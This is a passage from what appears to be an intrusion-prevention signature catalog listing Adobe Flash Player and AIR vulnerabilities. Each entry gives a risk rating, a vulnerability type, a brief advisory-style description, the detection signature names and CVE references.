First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Flash Player
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in Adobe Flash. The vulnerability is due to an issue with parsing ID3 tag data. A remote attacker could exploit this vulnerability by enticing a user into opening a specially crafted SWF or web page. Successful exploitation could lead to arbitrary code execution under the security context of the user process.
Situation: File-Binary_Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow
References:
CVE-2015-5560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5560
Back to top

Adobe-Flash-parseFloat-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Buffer Overflow
Description: A stack based buffer overflow has been reported in Adobe Flash. The vulnerability is due to insufficient checks on a buffer size prior to a copy operation. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open a page embedding a maliciously crafted SWF file. Successful exploitation could lead to arbitrary code execution under the security context of the running process.
Situation: File-Flash_Adobe-Flash-parseFloat-Stack-Buffer-Overflow
References:
CVE-2014-9163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9163
OSVDB-115560
http://www.osvdb.org/115560
Back to top

Adobe-Flash-PCRE-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Flash
Risk: High
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Input Validation
Description: A memory corruption vulnerability has been reported in Adobe Flash. The vulnerability is due to an error while handling regular expressions. A remote attacker can exploit this vulnerability by enticing a user to process a maliciously crafted Flash file. This can lead to code execution in the context of the affected user.
Situation: File-Flash_Adobe-Flash-PCRE-Memory-Corruption
References:
CVE-2015-0318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0318
BID-72514
http://www.securityfocus.com/bid/72514
OSVDB-117972
http://www.osvdb.org/117972
Back to top

Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player
Type: Malfunction
Description: An integer underflow vulnerability has been reported in Adobe Flash Player and AIR. The vulnerability is due to an issue when parsing a flash file using domain-global memory operations. A remote attacker could exploit these vulnerabilities by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow
References:
CVE-2014-0569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0569
OSVDB-113199
http://www.osvdb.org/113199
Back to top

Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities

About this vulnerability: A vulnerability in Adobe Flash Player and Adobe AIR
Risk: High
First detected in: sgpkg-ips-1106-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player
Type: Malfunction
Description: Multiple vulnerabilities exist in Adobe Flash Player and AIR due to an issue in the way certain SWF content is displayed. A remote attacker could exploit these vulnerabilities by enticing a target user to open a crafted file. A successful attack could result in a denial of service or the execution of arbitrary code.
Situation: File-Flash_Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities
References:
CVE-2014-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0558
Back to top

Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems AIR
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Flash Player
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Adobe Flash Player. The vulnerability is due to an error while concatenating large strings. A remote attacker could exploit this vulnerability by enticing a user to open a webpage with a crafted flash content. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Flash_Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow
References:
CVE-2014-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0550
OSVDB-111105
http://www.osvdb.org/111105
Back to top

Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A type confusion vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue when processing ASnative 2100 NetConnection calls where a failure to validate the object type occurs. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page. Successful exploitation could lead to arbitrary code execution under the security context of the user process.
Situation: File-Flash_Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion
References:
CVE-2015-0336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0336
BID-73084
http://www.securityfocus.com/bid/73084
OSVDB-119482
http://www.osvdb.org/119482
Back to top

Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113

About this vulnerability: Adobe Flash Player Buffer Overflow
Risk: High
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a heap buffer overflow vulnerability in Adobe Flash Player.
Situation: File-Flash_Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113
References:
CVE-2015-3113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3113
Back to top

Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Integer Overflow
Description: There has been reported an out-of-bounds access vulnerability in Adobe Flash Player. This vulnerability could be exploited by having a target user to open a maliciously crafted SWF file.
Situation: File-Flash_Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access
References:
CVE-2017-11213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11213
Back to top

Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player
Type: Malfunction
Description: An uninitialized reference vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a failure to initialize an object pointer prior to its access when calling uncompress on a ByteArray. A remote attacker could exploit this vulnerability by enticing a target user to open a specially crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference
References:
CVE-2014-8440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8440
OSVDB-114489
http://www.osvdb.org/114489
Back to top

Adobe-Flash-Player-ByteArray-Use-After-Free-RCS

About this vulnerability: A vulnerability in Adobe Flash
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Double Free
Description: A use-after-free vulnerability exists in Adobe Flash Player. Linux, Windows and OS X browsers running vulnerable versions of Flash can be exploited for full code execution.
Situation: File-Flash_Adobe-Flash-Player-ByteArray-Use-After-Free-RCS
References:
CVE-2015-5119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5119
Back to top

Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems AIR desktop runtime
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A use-after-free vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue with a dangling reference to the Matrix array object of a ConvolutionFilter when handling certain prototype calls. A remote attacker could exploit this vulnerability by enticing a user into opening a malicious SWF. Successful exploitation could lead to arbitrary code execution under the security context of the user process.
Situation: File-Flash_Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free
References:
CVE-2015-0349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349
Back to top

Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems AIR
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Flash Player
Type: Integer Overflow
Description: A heap buffer overflow exists in Adobe Flash Player. The vulnerability is due to an integer overflow of the position property of a BitmapData object leading to a heap buffer overflow in copyPixelsToByteArray(). A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow
References:
CVE-2014-0556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0556
BID-69696
http://www.securityfocus.com/bid/69696
OSVDB-111110
http://www.osvdb.org/111110
Back to top

Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an out of bounds array copy in the copyRawDataTo() method of Matrix3D class. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file. This can lead to code execution in the context of the affected application.
Situation: File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing-2
File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing
References:
CVE-2012-5054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5054
Back to top

Adobe-Flash-Player-CVE-2014-8439-Write-What-Where

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A write what where vulnerability exists in Adobe Flash Player. The vulnerability is due to a memory corruption when handling ByteArray objects. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-CVE-2014-8439-Write-What-Where
References:
CVE-2014-8439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8439
BID-71289
http://www.securityfocus.com/bid/71289
OSVDB-115035
http://www.osvdb.org/115035
Back to top

Adobe-Flash-Player-CVE-2015-3106-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There is a Use After Free vulnerability in Adobe Flash Player.
Situation: File-Flash_Adobe-Flash-Player-CVE-2015-3106-Use-After-Free
References:
CVE-2015-3106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3106
Back to top

Adobe-Flash-Player-CVE-2015-5561-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There is a Use After Free vulnerability in Adobe Flash Player.
Situation: File-Flash_Adobe-Flash-Player-CVE-2015-5561-Use-After-Free
References:
CVE-2015-5561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5561
Back to top

Adobe-Flash-Player-CVE-2017-2927

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Flash
Situation: File-Binary_Adobe-Flash-Player-CVE-2017-2927
References:
CVE-2017-2927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2927
Back to top

Adobe-Flash-Player-CVE-2017-2934

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Flash
Situation: File-Binary_Adobe-Flash-Player-CVE-2017-2934
References:
CVE-2017-2934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2934
Back to top

Adobe-Flash-Player-CVE-2018-15982-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There has been reported a use-after-free vulnerability in Adobe Flash Player. This vulnerability can be exploited by having a target user to open a maliciously crafted SWF that is usually embedded inside a document or a web page. Successful exploitation leads to arbitrary code execution.
Situation: File-OLE_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
File-Flash_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
References:
CVE-2018-15982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15982
Back to top

Adobe-Flash-Player-CVE-2018-4878-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Flash Player Desktop Runtime
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There has been reported a use-after-free vulnerability in Adobe Flash Player. This vulnerability can be exploited by having a target user to open a maliciously crafted SWF file. Successful exploitation leads to arbitrary code execution.
Situation: File-OLE_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
File-Flash_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
References:
CVE-2018-4878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878
Back to top

Adobe-Flash-Player-DeleteRangeTimelineOperation-Type-Confusion

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: Adobe Flash Player
Type: Type Confusion
Description: A vulnerability in Adobe Flash Player, version 21.0.0.182, which allows remote attackers to execute arbitrary code via unspecified vectors.
Situation: File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
References:
CVE-2016-4117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117
Back to top

Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A use after free vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue with Worker objects clearing domain memory. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free
References:
CVE-2015-0313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0313
BID-72429
http://www.securityfocus.com/bid/72429
OSVDB-117853
http://www.osvdb.org/117853
Back to top

Adobe-Flash-Player-Domainmemory-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: Moderate
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A memory corruption vulnerability exists in Adobe Flash Player. The vulnerability is due to a use after free error when handling the objects referenced by domainMemory. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-Domainmemory-Use-After-Free
References:
CVE-2015-0311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0311
BID-72283
http://www.securityfocus.com/bid/72283
OSVDB-117428
http://www.osvdb.org/117428
Back to top

Adobe-Flash-Player-Domainmemory-Write-Use-After-Free

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A use after free vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue with Worker objects writing domain memory. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-Domainmemory-Write-Use-After-Free
References:
CVE-2015-0359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359
Back to top

Adobe-Flash-Player-Filereference-Type-Confusion

About this vulnerability: A vulnerability in Adobe Systems AIR desktop runtime
Risk: High
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a type confusion vulnerability in Adobe Flash. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Flash_Adobe-Flash-Player-Filereference-Type-Confusion
References:
CVE-2016-1105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1105
Back to top

Adobe-Flash-Player-Flawed-Bytecode-Verification-CVE-2017-11292

About this vulnerability: A vulnerability in Adobe Flash
Risk: Moderate
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There exists a bytecode verification vulnerability in Adobe Flash player.
Situation: File-Flash_Invalid-Bytecode-CVE-2017-11292
References:
CVE-2017-11292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11292
Back to top

Adobe-Flash-Player-FLV-Processing-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Adobe Flash Player. The vulnerability is due to lack of input validation while parsing script data tags in FLV files. A remote attacker can exploit this vulnerability by enticing the target user to open malicious FLV files, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
File-Flash_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
References:
CVE-2007-3456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3456
BID-24856
http://www.securityfocus.com/bid/24856
OSVDB-38054
http://www.osvdb.org/38054
Back to top

Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution

About this vulnerability: A vulnerability in Adobe Systems Flash Player (for Linux)
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Adobe Flash Player; Adobe Systems AIR
Type: Input Validation
Description: There exists a remote command execution vulnerability in Adobe Flash Player for Linux.
Situation: HTTP_SS-Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-3
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-2
References:
CVE-2008-5499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499
BID-32896
http://www.securityfocus.com/bid/32896
OSVDB-50796
http://www.osvdb.org/50796
Back to top

Adobe-Flash-Player-Function-Variables-Information-Disclosure

About this vulnerability: An attempt to exploit vulnerability in Adobe Flash Player Detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A code execution vulnerability exists in Adobe Flash Player 10. The vulnerability is due to information disclosure when passing variable length arguments to an ActionScript function. The vulnerability could allow a remote attacker to access arbitrary memory locations in ActionScript in order to execute arbitrary code on the affected system through techniques such as forced type confusion.
Situation: HTTP_SS-Adobe-Flash-Player-Function-Variables-Information-Disclosure
File-Flash_Adobe-Flash-Player-Function-Variables-Information-Disclosure
References:
CVE-2011-2110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110
OSVDB-73007
http://www.osvdb.org/73007
Back to top

Adobe-Flash-Player-Index-Overflow-Vulnerability

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Buffer Overflow
Description: There is an index overflow vulnerability in Adobe Flash player.
Situation: File-Flash_Adobe-Flash-Player-Index-Overflow-Vulnerability
References:
CVE-2012-5676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5676
Back to top

Adobe-Flash-Player-Information-Disclosure

About this vulnerability: An Adobe Flash Player Information Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Insecure Configuration
Description: A vulnerability in Adobe Flash Player Manager, versions before 14.0.0.145, which allows remote attackers to obtain sensitive information by conducting a cross-site request forgery attack against JSONP endpoints.
Situation: File-Text_Adobe-Flash-Player-Information-Disclosure
References:
CVE-2014-4671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4671
Back to top

Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player; Adobe Flash Professional; Adobe Systems AIR; Adobe Systems Flex
Type: Malfunction
Description: A vulnerability exists in the Adobe Flash Player.
Situation: HTTP_SS-Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
File-Text_Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
References:
CVE-2009-0520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0520
BID-33880
http://www.securityfocus.com/bid/33880
Back to top

Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow

About this vulnerability: A heap overflow vulnerability in Adobe Systems Macromedia Flash Player
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Adobe Flash Player. The vulnerability is due to lack of input validation while parsing height and width fields in the JPG header. A remote attacker can exploit this vulnerability by enticing the target user to open malicious SWF files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.
Situation: HTTP_SS-Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
File-Flash_Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
References:
CVE-2007-6242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6242
BID-26951
http://www.securityfocus.com/bid/26951
Back to top

Adobe-Flash-Player-Load-And-Store-Write-What-Where

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Input Validation
Description: An code execution vulnerability exists in Adobe Flash player. It has been reported to be used by malware in the wild. A remote attacker could exploit this vulnerability by enticing a user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Flash_Adobe-Flash-Player-Load-And-Store-Write-What-Where
References:
CVE-2014-0497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0497
BID-65327
http://www.securityfocus.com/bid/65327
Back to top

Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems AIR
Risk: High
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Flash Player
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Adobe Flash player. When the flash.media.Sound.loadPCMFromByteArray function is called with a large number of samples in the parameter, an integer overflow occurs. This is then used in the indexing of arrays leading to a potential buffer overflow. A remote attacker could exploit these vulnerabilities by enticing a user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Flash_Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow
References:
CVE-2012-5677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5677
BID-56896
http://www.securityfocus.com/bid/56896
OSVDB-88353
http://www.osvdb.org/88353
Back to top

Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: There has been reported an out-of-bounds access vulnerability in Adobe Flash Player. A remote attacker could exploit the vulnerability by enticing a user to open a maliciously crafted SWF file or a link. Successful exploitation of this vulnerability could lead to arbitrary code execution.
Situation: File-Flash_Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access
References:
CVE-2017-3114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3114
Back to top

Adobe-Flash-Player-MP4-File-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-444-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Integer Overflow
Description: There is a memory corruption vulnerability in Adobe Flash Player. The vulnerability is due to insufficient validation of a user-supplied length value when parsing MP4 files, which leads to an integer wraparound. A remote attacker could exploit this vulnerability by enticing a user to open a malicious MP4 file. Successful exploitation of this vulnerability would lead to execution of arbitrary code in the security context of the target user.
Situation: File-MPEG_Adobe-Flash-Player-MP4-File-Memory-Corruption
References:
CVE-2012-0754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754
BID-52034
http://www.securityfocus.com/bid/52034
OSVDB-79300
http://www.osvdb.org/79300
Back to top

Adobe-Flash-Player-MP4-File-Memory-Corruption-CVE-2015-0360

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: Moderate
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Integer Overflow
Description: There is a memory corruption vulnerability in Adobe Flash Player. A remote attacker could exploit this vulnerability by enticing a user to open a malicious MP4 file. Successful exploitation of this vulnerability would lead to execution of arbitrary code in the security context of the target user.
Situation: File-MPEG_Adobe-Flash-Player-MP4-File-Memory-Corruption
References:
CVE-2015-0360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360
Back to top

Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF

About this vulnerability: A vulnerability in Adobe Systems AIR
Risk: High
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems AIR; Adobe Flash Player
Type: Buffer Overflow
Description: There is a stack buffer overflow in Adobe Flash Player. The issue can manifest itself when it parses the Sequence Parameter Set structure in an MP4 file. An attacker could exploit this vulnerability by enticing a target user to visit a specially crafted web page. A successful attack leveraging this vulnerability could lead to arbitrary code execution on the vulnerable system in the security context of the affected application.
Situation: File-MPEG_Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF
References:
CVE-2011-2140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2140
OSVDB-74439
http://www.osvdb.org/74439
Back to top

Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Flash Player Desktop Runtime
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Adobe Flash Player. The vulnerability is due to an issue with the processing of Nellymoser audio tag data. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.
Situation: File-Flash_Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow
References:
CVE-2015-3113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3113
Back to top

Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Flash Player
Risk: High
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Flash Player
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to memory access without bounds checking while verifying OP_inclocal and OP_declocal opcodes. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to open a Flash file with an affected version of Adobe Flash Player. Successful exploitation would result in execution of arbitrary code in the security context of the affected application.
Situation: File-Flash_Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption
References:
CVE-2012-5271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5271
OSVDB-86048
